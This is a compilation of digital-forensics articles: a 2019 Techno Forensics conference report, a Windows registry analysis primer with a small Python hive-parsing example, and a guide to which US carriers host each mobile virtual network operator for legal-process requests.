The last talk of the first day was one of the most innovative and enlightening of the entire conference. It was given by A.G. Speake from Berla Corporation, on the topic of vehicle system forensics. The session gave a complete overview of what data can be acquired from infotainment and telematics systems within the vehicle, with an in-depth discussion of the non-destructive methods to acquire and analyze it. Two interesting case studies were presented: an incident that took place in London in 2017; and a kidnapping and murder that took place in Kennewick, WA, in which data from a rental car were extracted and analyzed. For an overview of vehicle forensics we suggest you take a look at this YouTube video: although it is not fully up to date, it provides an interesting overview of the potential of vehicle forensics.

At the end of the day a happy hour took place on the show floor, where the attendees had the chance to see some of the latest forensic hardware and software on the market.

12th March 2019 – Day Two

Day two had an early start at 8 a.m. with the keynote of the conference, provided by Matthew Rosenquist, Intel Corporation. The talk was titled “The Verification of Truth: The Future of Digital Forensics and its Role in Cybersecurity”. During the talk he discussed how “digital forensics” will grow to mean the verification of truth and will play an ever-increasing role in understanding responsibility and controlling the dissemination of fear, uncertainty, and doubt through actuarial data. Rosenquist’s presentation is available on Slideshare.

In the morning, a talk by Ed Michael from Cellebrite illustrated advanced analysis techniques for mobile device evidence analysis. In particular some examples of manual analysis of applications through the use of SQL queries and Python scripts were provided. The talk was really practical and full of references and examples for the audience.

Then we attended a brilliant talk on bypassing multi-factor authentication by Jeff Ham and James Hovious from Mandiant. They presented an updated version of the topic they had discussed at the SANS EU DFIR Summit in Prague last October: slides from the SANS event are available here.

The last talk of the morning, one of the most technical of the event, was from Jason Hale on how to improve USB device forensics in Windows OS, and some of the latest findings to be analyzed in this constantly-changing set of artifacts. Jason is the creator and developer of USB Detective: a community version of the software can be requested on the website.

The first talk after lunch was by Jessica Hyde on handling IoT evidence. Jessica did a great presentation illustrating the challenges of some of the most commonly found devices on the market like Amazon Echo, Alexa and Fitbit and how to extract data from them and from the related cloud accounts.

The last talk of the day was again on a really interesting emerging topic: the forensic analysis of drones. The presentation was given by Dave Rathbone from VTO Labs. The session illustrated the results of “The Drone Forensic Program” funded by the United States Department of Homeland Security. The project identified and defined the forensic best practices for the retrieval of data from consumer and professional level drones. The results of the research are publicly available here.

Day 2 ended with a cocktail reception in the amazing Parterre Gardens of the Hilton Hotel.

13th March 2019 – Day Three

Day 3 started with an early session on current trends in illegal dark web activity, with specific focus on the anatomy of a transaction and the role of cryptocurrencies. Then, an in-depth and technical presentation by Jason Roslewicz, SUMURI LLC, on “APFS Imaging” took place, addressing forensic imaging methods of APFS Macs.

The last talk of the morning was again by Jessica Hyde from Magnet Forensics, and it was about the iOS maturation from iOS 10 to iOS 12. Jessica provided a really detailed explanation of the improvements made by Apple to prevent access to the device and an overview of some of the most interesting artifacts available with a full file system image of an iOS device. A webinar on the same topic is available on Magnet Forensics’ website.

Lunch took place in the Hilton garden, with really tasty Mexican food!

Just after lunch was an interesting talk by Brian Hill from Oxygen Forensics, on geolocation data that can be extracted from mobile phones, drones and cloud accounts.

Next, Susteen gave a presentation on the latest developments in their DataPilot 10 mobile forensics device, developed for in-the-field acquisitions and recently introduced to the market. A review of this device was published on Forensic Focus in October 2018.

The last talk of the day was by Andrea Amico, an Italian researcher and founder of Privacy4Cars, a mobile application and SDK designed to help erase Personally Identifiable Information (PII) from modern vehicles. The app is available for free on both the Apple Store and Google Play, and it enables consumers and businesses to quickly delete data stored by modern vehicle infotainment systems. During the presentation Andrea illustrated the CarsBlues vulnerability, a Bluetooth-based attack that affects tens of millions of vehicles and was publicly disclosed in November 2018 by the company. A methodology to extract contacts and call logs from a vehicle through the Bluetooth connection was also illustrated. Some videos demonstrating this technique are available on Privacy4Cars’ YouTube channel.

The conference ended with some time for socializing at the Hilton pool. Overall it was a great event and provided a good opportunity to see where digital forensics is going now and in the future.

The next Techno Forensics event will take place in Myrtle Beach between 2nd and 5th June 2019. Next year’s San Diego chapter is planned for 9th – 11th March 2020.

Windows Registry Analysis 101


by Chirath De Alwis

Computer forensics is the process of methodically examining computer media (hard disks, diskettes, tapes, etc.) for evidence [1]. When considering computer forensics, registry forensics plays a huge role because of the amount of data that is stored in the registry and the importance of that data. Extracting this data is therefore highly important in an investigation. Because few tools can extract forensically valuable data from registry files, investigators have to extract it manually, and the registry file format (.REG) makes extracting information a challenging task. Registry files normally store data under unique values called “Keys”. One challenge investigators face is a lack of knowledge about registry keys and the data stored under those keys. This article provides an overview of registry file acquisition, registry structure and common issues in registry analysis.

Registry File Acquisition

The Windows registry is a central hierarchical database intended to store information that is necessary to configure the system for one or more users, applications or hardware devices [2]. There are four main registry files: System, Software, Security and SAM. Each registry file contains different information, stored under keys. The structure of the Windows registry is similar to file system directories. Registry files are located at the “C:drive/windows/system32/config/” file path. Each registry file contains a great deal of forensically valuable information.

Investigating the Windows registry is quite a difficult task, because in order to investigate it properly the registry needs to be extracted from the computer. Extracting a registry file is not a normal copy-and-paste operation: since registry files store all the configuration information of the computer, they are updated automatically every second. In order to extract Windows registry files from a computer, investigators have to use third-party software such as FTK Imager [3], EnCase Forensic [4] or similar tools. FTK Imager is one of the most widely used tools for this task. Apart from using third-party software, some research has been carried out to demonstrate how to extract registry information from Windows CE memory images [9] and from volatile memory (RAM) [10].

AccessData FTK Imager

AccessData FTK (Forensic Tool Kit) Imager is the most widely used standalone disk imaging program for extracting the Windows registry from a computer. AccessData FTK Imager 3.2.0.0 scans the hard drive in order to identify various pieces of information. The tool can read from several kinds of source when extracting the Windows registry. These are:

  • Physical Drive – Extract from a hard drive
  • Logical Drive – Extract from a partition
  • Image File – Extract from an image file
  • Contents of a Folder – Logical file-level analysis only: excludes deleted files and unallocated space

The steps to extract registry files from Access Data FTK Imager 3.2.0.0 are as follows.

Step 1 – Open “Access Data FTK Imager 3.2.0.0”.

Figure 1 : Main Window – Access Data FTK Imager 3.2.0.0

Step 2 – Click on “Add Evidence Item” button.

Figure 2 : Select Source Window – Access Data FTK Imager 3.2.0.0

Step 3 – Select “Logical Drive” radio button.

Figure 3 : Select Source Window – Access Data FTK Imager 3.2.0.0

Step 4 – Select source drive.

Figure 4 : Select Drive Window – Access Data FTK Imager 3.2.0.0

Step 5 – Scan “MFT” by expanding “Evidence Tree”.

Figure 5 : FS Progress Window – Access Data FTK Imager 3.2.0.0

Step 6 – Go to windows/system32/config/.

Figure 6 : Extracted Information Window – Access Data FTK Imager 3.2.0.0

Step 7 – Export registry file by clicking “Export Files” button.

Figure 7 : Export File Pop Up Window – Access Data FTK Imager 3.2.0.0

Step 8 – Select the destination folder.

Figure 8 : Browse For Folder Window – Access Data FTK Imager 3.2.0.0

Registry Structure

The structure of the Windows registry is similar to file system directories. Both the Windows registry and the file system are organized in a tree structure [5]. The Windows registry stores all configuration settings as keys [6]. The registry updates its stored configurations according to the changes made while hardware and software are being used. In Windows XP, 2000 and 2003 (Windows NT based operating systems) the registry files are stored in the Windows\System32\Config folder.

As mentioned above, the structure of the Windows registry is similar to Windows folders and files. Each main folder is known as a “Hive”. Hives are made of a combination of sub folders, called “Keys”. These Keys contain Sub Keys with configuration information.

Figure 9 : Registry Structure (c) Help.comodo.com, 2019

The figure above shows a Registry Editor window of a computer. It shows the internal structure of the registry. A Hive is a logical group of keys, sub keys and values in the registry that has a set of supporting files containing backups of its data [7]. There are five main Hives:

  • HKEY_CLASSES_ROOT (HKCR)
  • HKEY_USERS (HKU)
  • HKEY_CURRENT_USER (HKCU)
  • HKEY_LOCAL_MACHINE (HKLM)
  • HKEY_CURRENT_CONFIG (HKCC)

Each registry hive has its own set of supporting files. According to Microsoft, the hives and their supporting files are [7]:

  • HKEY_CURRENT_CONFIG – System, System.alt, System.log, System.sav
  • HKEY_CURRENT_USER – Ntuser.dat, Ntuser.dat.log
  • HKEY_LOCAL_MACHINE\SAM – Sam, Sam.log, Sam.sav
  • HKEY_LOCAL_MACHINE\Security – Security, Security.log, Security.sav
  • HKEY_LOCAL_MACHINE\Software – Software, Software.log, Software.sav
  • HKEY_LOCAL_MACHINE\System – System, System.alt, System.log, System.sav
  • HKEY_USERS\.DEFAULT – Default, Default.log, Default.sav

In the HKEY_LOCAL_MACHINE Hive, there are five main Keys. Each Key contains Sub Keys with configuration information. These are:

  • HARDWARE
  • SAM (Security Accounts Manager)
  • SECURITY
  • SOFTWARE
  • SYSTEM

Figure 10 : The files in the Windows\System32\Config folder and their associations with the hives (c) Help.comodo.com, 2019

Figure 10 shows the information contained in the Software, System, SAM, Security, Default and Userdiff files and their respective associated file names.

Registry hive files are allocated in 4096-byte blocks, starting with a header, or base block, and continuing with a series of hive bin blocks. Each hive bin (HBIN) is typically 4096 bytes [5].
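To make that layout concrete, here is a small added Python parser (example code written for this article, not taken from it or from any tool it cites) that decodes the base block, checks its checksum and sequence numbers, and walks the hive bins and the cells inside them. It runs on a constructed sample hive built inline, so the hive name, cell sizes and offsets in the sample are assumptions, not values from a real system.

```python
import struct

BLOCK = 4096  # hives are laid out in 4096-byte blocks; the base block is the first

def base_block_checksum(block):
    """Windows' base-block checksum: XOR of the first 508 bytes as LE DWORDs."""
    csum = 0
    for (dword,) in struct.iter_unpack("<I", bytes(block[:508])):
        csum ^= dword
    if csum == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return csum or 1

def parse_base_block(data):
    """Decode the 'regf' base block that opens every hive file."""
    if data[:4] != b"regf":
        raise ValueError("not a registry hive: missing 'regf' signature")
    (seq1, seq2, _ts, major, minor, ftype, _fmt, root, bins_size,
     _cluster) = struct.unpack_from("<IIQIIIIIII", data, 4)
    name = bytes(data[0x30:0x70]).decode("utf-16-le").rstrip("\x00")
    stored = struct.unpack_from("<I", data, 0x1FC)[0]
    return {
        "name": name, "version": (major, minor), "file_type": ftype,
        "root_cell": root, "bins_size": bins_size,
        # mismatched sequence numbers mean the hive was mid-update when copied;
        # the .LOG transaction logs are then needed to reach a consistent state
        "consistent": seq1 == seq2,
        "checksum_ok": stored == base_block_checksum(data[:BLOCK]),
    }

def walk_hbins(data, bins_size):
    """Return [(hbin_offset, hbin_size, [(cell_offset, cell_size, in_use), ...])].
    Offsets are relative to the start of hive-bin data (file offset 4096),
    which is how key and value records reference each other."""
    off, end, hbins = BLOCK, BLOCK + bins_size, []
    while off < end:
        if data[off:off + 4] != b"hbin":
            raise ValueError("bad hbin signature at file offset 0x%x" % off)
        rel, size = struct.unpack_from("<II", data, off + 4)
        cells, c = [], off + 32  # 32-byte hbin header, then a run of cells
        while c < off + size:
            (csize,) = struct.unpack_from("<i", data, c)
            if csize == 0 or abs(csize) % 8:
                raise ValueError("corrupt cell size at file offset 0x%x" % c)
            cells.append((c - BLOCK, abs(csize), csize < 0))  # negative = in use
            c += abs(csize)
        hbins.append((rel, size, cells))
        off += size
    return hbins

def build_sample_hive(seq1=7, seq2=7):
    """Constructed sample (not from a real system): one hbin holding an
    allocated 96-byte 'nk' root cell followed by a single free cell."""
    base = bytearray(BLOCK)
    base[:4] = b"regf"
    struct.pack_into("<IIQIIIIIII", base, 4, seq1, seq2, 0, 1, 5, 0, 1, 32, BLOCK, 1)
    base[0x30:0x3C] = "SYSTEM".encode("utf-16-le")  # hypothetical hive name
    struct.pack_into("<I", base, 0x1FC, base_block_checksum(base))
    hbin = bytearray(BLOCK)
    hbin[:4] = b"hbin"
    struct.pack_into("<II", hbin, 4, 0, BLOCK)
    struct.pack_into("<i2s", hbin, 32, -96, b"nk")          # root key cell, in use
    struct.pack_into("<i", hbin, 32 + 96, BLOCK - 32 - 96)  # remaining space, free
    return bytes(base + hbin)
```

A hive whose sequence numbers disagree was copied while Windows was still writing it, which is exactly the hazard the acquisition section above describes; the parser flags it rather than silently trusting the image.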

Issues in Registry Analysis

There are a few main issues that investigators have to face when analyzing registry files.

  • Data Completeness – The amount of information required for the investigation will depend on the type of the investigation. Some investigations require more information than others. Because of this, investigators should ensure that all the data is present and complete. If this is not the case, the investigation may take extra time to complete and therefore be more costly.
  • Missing Data – Missing data reduces the accuracy of the investigation. Missing data can be sorted into three categories of randomness [8]:
    • Missing completely at random (MCAR)
    • Missing at random (MAR)
    • Missing not at random (MNAR)
  • Extracting Data – At present there is no technique to view registry files in real time. With the currently available technology, investigators can only take an image of a registry file. The disadvantage of this is that investigators cannot collect further information after they have captured the registry file.
  • Lack of Knowledge About Keys – Registry files store data with a unique key. Some investigators do not know all the keys which are stored in the registry files. This can lead to missing a lot of information. There are also some instances in which it is not possible to find out about certain keys and stored information.
  • Registry File Format – Registry files are stored in the “C:drive/windows/system32/config/” file path and they must be ripped and converted into a readable format before being used in an investigation.

References

  1. Vacca, J. (2005). Computer Forensics: Computer Crime Scene Investigation. 2nd ed.
  2. Carvey, H. (2011). Windows Registry Forensics. Burlington: Elsevier Science.
  3. AccessData. (2019). FTK Imager. [online] Available at: https://accessdata.com/product-download/ftk-imager-version-4.2.0 [Accessed 20 March 2019].
  4. Guidance Software. (2019). EnCase Forensic. [online] Available at: https://www.guidancesoftware.com/encase-forensic [Accessed 21 March 2019].
  5. Morgan, T. D. (2008). Recovering deleted data from the Windows registry. ScienceDirect, [online] pp. S35, S36. Available at: http://www.sciencedirect.com [Accessed 20 March 2019].
  6. Help.comodo.com. (2019). Windows Registry – Overview, Structure, Benefits, Registry Cleaner | Cloud Scanner Version 2.0. [online] Available at: https://help.comodo.com/topic-73-1-147-845-.html [Accessed 23 March 2019].
  7. Msdn.microsoft.com. (2019). Registry Hives (Windows). [online] Available at: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724877(v=vs.85).aspx [Accessed 20 March 2019].
  8. Gliklich, R., Dreyer, N. and Leavy, M. (2014). Analysis, Interpretation, and Reporting of Registry Data To Evaluate Outcomes. Agency for Healthcare Research and Quality (US). [online] Available at: http://www.ncbi.nlm.nih.gov/books/NBK208602/ [Accessed 20 March 2019].
  9. Yang, S. et al. (2013). A Method on Extracting Registry Information from Windows CE Memory Images. [online] Available at: https://ieeexplore.ieee.org/document/6835701 [Accessed 25 March 2019].
  10. Zhang, S., Wang, L. and Zhang, L. (2011). Extracting windows registry information from physical memory. [online] Available at: https://ieeexplore.ieee.org/document/5764089 [Accessed 25 March 2019].

About The Author

Chirath De Alwis is an information security professional with more than four years’ experience in the information security domain. He holds a BEng (Hons), a PGDip and eight professional certifications in cyber security, and is also reading for an MSc specializing in cyber security. Currently, Chirath is involved in vulnerability management, threat intelligence, incident handling and digital forensics activities in Sri Lankan cyberspace. You can contact him at chirathdealwis@gmail.com.

Mobile Virtual Network Operators (MVNOs) In The US


by Patrick Siewert

Increasingly, cellular records and their associated location information are being used in civil litigation, where previously they were considered to be a “law enforcement only” tool. But in an age when users carry at least one smartphone with them at all times, the location data associated with calls, texts and data usage can be crucial evidence in certain cases. These include insurance fraud investigations, domestic, custody and cohabitation matters, and personal injury cases.

As we’ve detailed in previous articles, there are five main US-based cellular carriers: Verizon Wireless, AT&T, Sprint, T-Mobile and U.S. Cellular. But what about those not on the list of five? What about Boost, Straight Talk, Virgin Mobile, Cricket, Tracfone, and so on? These carriers are all what are known as mobile virtual network operators, or MVNOs. Check out our article detailing the record retention periods for each provider.

Essentially, MVNOs operate by “leasing” the use of one of the five main cellular carriers, or sometimes more than one, to increase subscribership and allow the use of multiple devices on their plans, many of which are pre-paid or pay-as-you-go. Some MVNOs operate strictly on CDMA or GSM networks and some operate on both. Some MVNOs may be nationwide and some may be regional, as was the case in a recent matter we dealt with involving an MVNO based in the Tennessee Valley. The fact is, MVNOs far outnumber their host networks.

The first step is to determine which carrier the target of your investigation subscribes to, or which carrier owns the service for that number. For this, the simplest resource is the Hawk Analytics Support site, which is free with registration. The support site also has articles, sample wording for legal process, best practice documentation and more.

When you identify that the carrier to which you need to submit legal process is an MVNO, one of several things may happen upon submission, depending on what type of information you’re seeking and which MVNO the account you’re interested in is associated with. For example, Boost or Virgin Mobile will refer you to Sprint’s legal compliance center for all types of requests, but Tracfone will not provide records for cell site listings and GPS location information; those requests will be referred to the parent network. It really just depends on the MVNO you’re dealing with. Remember, even if the account is a pre-paid “drop/burner phone” and the subscriber didn’t have to give a name or ID when initiating the account, there can still be great investigative data contained in the records.

And remember, only Verizon Wireless stores standard text message (SMS) content, for a minimum of 3 and a maximum of 10 days. After that, the information is purged.

As a quick reference, we have compiled a list of major MVNOs that you may run across in your investigations. All of the addresses for service of legal process to the respective MVNOs may be found on the ISP listing under the “Resources” tab on search.org.

Verizon Wireless-Only MVNOs

  • Xfinity Mobile (Comcast)
  • Affinity Cellular
  • Spectrum Mobile
  • Total Wireless
  • GreatCall

AT&T-Only MVNOs

  • Black Wireless
  • Cricket Wireless
  • EasyGO Wireless
  • FreeUP Mobile
  • Jolt Mobile
  • Pure Talk USA
  • RuraLTE
  • ZillaTalk

Sprint-Only MVNOs

  • Boost Mobile
  • Chit Chat Mobile
  • Kroger i-wireless
  • Patriot Mobile
  • Ready Mobile
  • Tello US
  • Scratch Wireless
  • Virgin Mobile USA

T-Mobile-Only MVNOs

  • China Telecom Americas (CTExcel)
  • GoSmart Mobile
  • KidsConnect
  • Liberty Wireless
  • Mint Mobile
  • Roam Mobility
  • SeaWolf Wireless
  • Simple Mobile
  • Ultra Mobile
  • Value Wireless
  • Walmart Family Mobile

As previously stated, some MVNOs use multiple networks for their service. Which network is utilized can depend on where the device is purchased (e.g., Walmart, Target, etc.) and/or what type of device is selected for use. This naturally allows the MVNO to cast a wider net and attract more customers, but it can make things confusing for investigators who are trying to figure out where to submit legal process. Here are some of the more common cross-carrier MVNOs:

  • FreedomPop:  AT&T, Sprint
  • Consumer Cellular:  AT&T, T-Mobile (GSM)
  • Republic Wireless:  Sprint, T-Mobile
  • Flash Wireless:  Sprint, Verizon
  • Expo Mobile:  Sprint, Verizon
  • EcoMobile:  Sprint, T-Mobile, Verizon
  • Red Stick Wireless:  Sprint, T-Mobile, Verizon
  • Best Cellular:  AT&T, Sprint, T-Mobile, Verizon
  • Red Pocket Mobile:  AT&T, Sprint, T-Mobile, Verizon
  • Straight Talk:  AT&T, Sprint, T-Mobile, Verizon
  • Net10 Wireless:  AT&T, Sprint, T-Mobile, Verizon, US Cellular
  • Boom Mobile:  AT&T, Sprint, Verizon
  • TracFone:  AT&T, Sprint, T-Mobile, Verizon, US Cellular (feature phones only)
  • Google Fi:  Sprint, T-Mobile, US Cellular

A complete and up-to-date list of MVNOs, their networks and some features about the available plans can be found at this Wikipedia page.

Wrapping It Up

MVNOs are a fact of life when using cellular location data in investigations. By arming yourself with the knowledge of which MVNO operates on which parent network and which information is available from whom, you can save valuable time, money and heartache. Happy hunting!

About The Author

Patrick Siewert is the Principal Consultant of Pro Digital Forensic Consulting, based in Richmond, Virginia. In 15 years of law enforcement, he investigated hundreds of high-tech crimes, incorporating digital forensics into the investigations, and was responsible for investigating some of the highest jury and plea bargain child exploitation cases in Virginia court history. Patrick is a graduate of SCERS, BCERT, the Reid School of Interview & Interrogation and multiple online investigation schools (among others). He is a Cellebrite Certified Operator and Physical Analyst as well as certified in cellular call detail analysis and mapping. He continues to hone his digital forensic expertise in the private sector while growing his consulting & investigation business marketed toward litigators, professional investigators and corporations, while keeping in touch with the public safety community as a Law Enforcement Instructor.

Email:  Inquiries@ProDigital4n6.com
Web: www.ProDigital4n6.com
LinkedIn
Twitter: @ProDigital4n6
